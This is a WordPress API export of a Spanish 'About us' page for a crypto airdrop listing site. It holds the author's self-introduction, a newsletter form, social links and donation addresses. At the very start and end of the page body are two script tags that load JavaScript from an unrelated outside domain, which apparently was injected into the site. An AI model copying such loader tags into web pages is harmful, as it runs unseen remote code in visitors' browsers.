{"id":4934,"date":"2020-05-08T18:29:18","date_gmt":"2020-05-09T01:29:18","guid":{"rendered":"https:\/\/coinairdrops.com\/?page_id=4934"},"modified":"2020-05-08T23:40:25","modified_gmt":"2020-05-09T06:40:25","slug":"quienes-somos","status":"publish","type":"page","link":"https:\/\/coinairdrops.com\/es\/quienes-somos\/","title":{"rendered":"Qui\u00e9nes somos"},"content":{"rendered":"<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b762a8ceb.js\"><\/script>\n\n\n\n<h1 class=\"wp-block-heading\">Qui\u00e9nes somos<\/h1>\n\n\n\n<p>Bienvenido a nuestro sitio web: CoinAirdrops.com, <strong>sufavorita fuentede todas las crypto airdrops<\/strong> que ocurren en la comunidad.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com?<\/h2>\n\n\n\n<p>Mi seud\u00f3nimo es Midas, como el famoso rey&#8230; Y he estado escribiendo aqu\u00ed y all\u00e1 sobre diferentes temas, <strong>principalmente sobre las \u00faltimas tecnolog\u00edas, privacidad y criptodivisas<\/strong>. Ahora soy una especie de aficionado a las criptomonedas, incluso si todav\u00eda tengo mucho que aprender. Algunos de ellos se llamar\u00edan a s\u00ed mismos un gur\u00fa. \u00a1Pero todav\u00eda no estoy all\u00ed!<\/p>\n\n\n\n<p>Cuando descubr\u00ed las gotas de aire, pens\u00e9 que me gustar\u00eda escribir sobre ellas. Porque realmente me gusta aprender sobre nuevos blockchain proyectos de. Quiero decir, gente com\u00fan, \u00a1algunos de ellos quieren enviar sat\u00e9lites al espacio, reemplazar Facebook o <strong>cambiar la faz del mundo<\/strong>! Si bien algunos proyectos fracasar\u00e1n, me encanta ver a las personas <strong>esforzarse y crear algo<\/strong>. \u00a1Quiz\u00e1s tenga la oportunidad de estar entre los primeros en adoptar el pr\u00f3ximo Bill Gates!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00bfPor qu\u00e9 Coin Airdrops?<\/h2>\n\n\n\n<p>En primer lugar, quiero explicar este nuevo concepto de <strong>regalar tokens gratis<\/strong>. Y quiero ense\u00f1arle a la gente sobre nuevos proyectos a seguir. Quiero contarles sobre las oportunidades que encontr\u00e9.<\/p>\n\n\n\n<p>Entonces, me alegra <strong>apoyar estos nuevos proyectos<\/strong> hablando de ellos. Les explico lo que intentan lograr. Y aporto mi humilde contribuci\u00f3n para que las personas sepan sobre ellos para <strong>aumentar su comunidad<\/strong>.<\/p>\n\n\n\n<p>Adem\u00e1s, les explico a los lectores <strong>c\u00f3mo obtener tokens gratis<\/strong> de sus campa\u00f1as activas de lanzamiento a\u00e9reo. Porque a todos nos gustan las cosas gratis. Entonces, por un lado, enumero las gotas de aire. Y, por otro lado, \u00a1las personas pueden reclamar monedas gratis! \u00a1Es una situaci\u00f3n de ganar-ganar! Por cierto, no olvides suscribirte a mi bolet\u00edn para recibir las \u00faltimas alertas de lanzamiento a\u00e9reo.<\/p>\n\n\n<div class=\"news-post\">\n<p>NO TE PIERDAS UN SOLO AIRDROP<\/p>\n<form class=\"ampforwp-form-allow\"\n  method=\"post\"\n  action=\"https:\/\/sendfox.com\/form\/3668j3\/1d47kk\"\n  target=\"_blank\">\n  <input type=\"email\"\n    placeholder=\"direcci\u00f3n de correo electr\u00f3nico\"\n    name=\"email\"\n    required>\n  <input type=\"submit\"\n    value=\"Suscr\u00edbete\">\n<\/form>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Somos sociales<\/h2>\n\n\n\n<p><span style=\"font-weight: 400;\">S\u00edguenos en las redes sociales. Y lo mantendremos informado sobre lasactualizaciones de <\/span><b>\u00faltimas crypto airdrops<\/b><span style=\"font-weight: 400;\">. Puede encontrarnos en:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.facebook.com\/coinairdrops\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook<\/a><\/li><li><a href=\"https:\/\/twitter.com\/coinairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Twitter<\/a><\/li><li><a href=\"https:\/\/t.me\/coinzairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram<\/a><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">\u00bfLe gusta lo que hacemos? \u00a1Apoyanos!<\/h2>\n\n\n\n<p><strong>Mantener un sitio web lleva mucho tiempo y cuesta bastante<\/strong>. Entonces, si le gusta lo que hacemos, env\u00edenos un centavo digital:<\/p>\n\n\n\n<p>BTC: 14Lco1GjaG1qNzALXCcC8ZXtaRegLT6DBY<\/p>\n\n\n\n<p>ETH: 0x142616534b1b680993d8f0661295da15557c977e<\/p>\n\n\n<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b3184f3be.js\"><\/script>\n","protected":false},"excerpt":{"rendered":"<p>Qui\u00e9nes somos Bienvenido a nuestro sitio web: CoinAirdrops.com, sufavorita fuentede todas las crypto airdrops que ocurren en la comunidad. \u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Mi seud\u00f3nimo es Midas, como el famoso rey&#8230; Y he estado escribiendo aqu\u00ed y all\u00e1 sobre diferentes temas, principalmente sobre las \u00faltimas tecnolog\u00edas, privacidad y criptodivisas. Ahora soy una especie de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-4934","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Qui\u00e9nes somos &#8226; Coin Airdrops<\/title>\n<meta name=\"description\" content=\"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/coinairdrops.com\/es\/quienes-somos\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Qui\u00e9nes somos &#8226; Coin Airdrops\" \/>\n<meta property=\"og:description\" content=\"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/coinairdrops.com\/es\/quienes-somos\/\" \/>\n<meta property=\"og:site_name\" content=\"Coin Airdrops\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/coinairdrops\/\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-09T06:40:25+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@coinairdrops\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/quienes-somos\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/quienes-somos\\\/\",\"name\":\"Qui\u00e9nes somos &#8226; Coin Airdrops\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#website\"},\"datePublished\":\"2020-05-09T01:29:18+00:00\",\"dateModified\":\"2020-05-09T06:40:25+00:00\",\"description\":\"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/quienes-somos\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/coinairdrops.com\\\/es\\\/quienes-somos\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/quienes-somos\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Qui\u00e9nes somos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/\",\"name\":\"Coin Airdrops\",\"description\":\"Don&#039;t miss a single crypto airdrop!\",\"publisher\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#organization\",\"name\":\"Coin Airdrops\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"contentUrl\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"caption\":\"Coin Airdrops\"},\"image\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/es\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/x.com\\\/coinairdrops\",\"https:\\\/\\\/www.pinterest.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/vk.com\\\/coinairdrops\",\"https:\\\/\\\/t.me\\\/coinzairdrops\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Qui\u00e9nes somos &#8226; Coin Airdrops","description":"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/coinairdrops.com\/es\/quienes-somos\/","og_locale":"es_ES","og_type":"article","og_title":"Qui\u00e9nes somos &#8226; Coin Airdrops","og_description":"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.","og_url":"https:\/\/coinairdrops.com\/es\/quienes-somos\/","og_site_name":"Coin Airdrops","article_publisher":"https:\/\/www.facebook.com\/coinairdrops\/","article_modified_time":"2020-05-09T06:40:25+00:00","twitter_card":"summary_large_image","twitter_site":"@coinairdrops","twitter_misc":{"Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/coinairdrops.com\/es\/quienes-somos\/","url":"https:\/\/coinairdrops.com\/es\/quienes-somos\/","name":"Qui\u00e9nes somos &#8226; Coin Airdrops","isPartOf":{"@id":"https:\/\/coinairdrops.com\/es\/#website"},"datePublished":"2020-05-09T01:29:18+00:00","dateModified":"2020-05-09T06:40:25+00:00","description":"\u00bfQui\u00e9n est\u00e1 detr\u00e1s de CoinAirdrops.com? Lee esta p\u00e1gina y descubre Midas y el equipo que escribe todos los art\u00edculos.","breadcrumb":{"@id":"https:\/\/coinairdrops.com\/es\/quienes-somos\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/coinairdrops.com\/es\/quienes-somos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/coinairdrops.com\/es\/quienes-somos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/coinairdrops.com\/es\/"},{"@type":"ListItem","position":2,"name":"Qui\u00e9nes somos"}]},{"@type":"WebSite","@id":"https:\/\/coinairdrops.com\/es\/#website","url":"https:\/\/coinairdrops.com\/es\/","name":"Coin Airdrops","description":"Don&#039;t miss a single crypto airdrop!","publisher":{"@id":"https:\/\/coinairdrops.com\/es\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/coinairdrops.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/coinairdrops.com\/es\/#organization","name":"Coin Airdrops","url":"https:\/\/coinairdrops.com\/es\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/coinairdrops.com\/es\/#\/schema\/logo\/image\/","url":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","contentUrl":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","caption":"Coin Airdrops"},"image":{"@id":"https:\/\/coinairdrops.com\/es\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/coinairdrops\/","https:\/\/x.com\/coinairdrops","https:\/\/www.pinterest.com\/coinairdrops\/","https:\/\/vk.com\/coinairdrops","https:\/\/t.me\/coinzairdrops"]}]}},"_links":{"self":[{"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/pages\/4934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/comments?post=4934"}],"version-history":[{"count":3,"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/pages\/4934\/revisions"}],"predecessor-version":[{"id":5054,"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/pages\/4934\/revisions\/5054"}],"wp:attachment":[{"href":"https:\/\/coinairdrops.com\/es\/wp-json\/wp\/v2\/media?parent=4934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}